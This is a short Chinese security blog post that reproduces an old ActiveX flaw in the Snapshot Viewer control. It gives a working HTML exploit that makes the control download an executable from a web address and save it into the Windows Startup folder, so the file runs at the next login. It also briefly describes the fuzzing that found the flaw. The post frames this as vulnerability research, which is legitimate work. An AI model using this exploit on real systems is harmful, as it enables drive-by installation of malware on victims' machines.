今天有人发了个Snapshot Viewer的ADV,结合CERT那篇dranzer.pdf,重现漏洞
EXP:
<html> <object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object> <script language='javascript'> var buf1 = 'http://127.0.0.1/a.exe'; var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe'; obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot(); </script> </html>
Fuzzing 时一般是对单个Property和单个Method()做FUZZ,这时会检测到对SnapshotPath有HTTP GET。然后想想它总是需要保存到本地的,再测试其他Property。由于此ActiveX的Property和Method都非常少,很快可以 FUZZ完
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论